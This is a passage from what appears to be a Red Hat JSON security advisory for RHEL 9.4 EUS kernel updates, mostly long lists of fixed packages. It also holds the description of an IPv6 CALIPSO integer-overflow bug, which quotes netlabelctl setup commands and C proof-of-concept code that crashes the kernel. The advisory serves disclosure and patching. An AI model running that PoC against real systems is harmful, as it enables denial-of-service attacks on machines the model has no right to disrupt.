"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service"
},
{
"cve": "CVE-2025-71085",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-01-13T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2429026"
}
],
"notes": [
{
"category": "description",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability allows an unprivileged user to trigger a kernel BUG by causing an integer overflow in the headroom calculation used by skb_cow(), which results in a negative size passed to pskb_expand_head(). The kernel subsequently hits a reachable BUG_ON() and crashes, leading to a reliable denial-of-service condition. In worst-case scenarios, this path may be reachable via crafted IPv6 traffic with CALIPSO options.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
